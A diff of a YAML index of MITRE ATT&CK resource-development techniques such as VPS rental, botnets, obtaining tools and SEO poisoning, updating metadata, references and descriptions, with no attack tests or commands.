-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -53483,22 +54124,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -53512,7 +54184,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -53599,11 +54271,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -53663,7 +54334,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -53705,7 +54375,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53720,7 +54390,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -53811,11 +54480,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -53848,15 +54516,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -53940,7 +54609,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -53994,7 +54662,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -54045,36 +54712,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -54083,21 +54724,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -54143,17 +54810,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -54179,7 +54845,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -54211,8 +54877,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -54239,7 +54903,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -54263,8 +54927,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -54290,7 +54952,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -54324,8 +54986,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -54373,7 +55033,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -54389,7 +55049,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -54448,54 +55107,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -54506,22 +55121,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -54584,37 +55243,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54638,11 +55298,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -54700,17 +55363,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
